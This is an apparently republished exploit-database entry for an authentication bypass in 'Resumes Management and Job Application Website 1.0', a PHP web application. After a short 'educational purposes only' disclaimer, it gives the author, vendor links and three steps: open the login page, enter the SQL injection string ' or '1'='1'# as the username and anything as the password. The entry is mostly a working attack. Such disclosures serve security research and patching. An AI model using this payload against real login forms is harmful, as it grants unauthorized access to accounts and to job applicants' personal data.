Resumes management and job application website 1.0 authentication bypass (sql injection) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-01-05 | Type : webapps | Platform : php
This exploit / vulnerability Resumes management and job application website 1.0 authentication bypass (sql injection) is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

# Exploit Title: Resumes Management and Job Application Website 1.0 - Authentication Bypass (Sql Injection)
# Date: 2020-12-27
# Exploit Author: Kshitiz Raj (manitorpotterk)
# Vendor Homepage: http://egavilanmedia.com
# Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/
# Version: 1.0
# Tested on: Windows 10/Kali Linux

Step 1 - Go to url http://localhost/Resumes/login.html
Step 2 - Enter Username :- ' or '1'='1'#
Step 3 - Enter Password - anything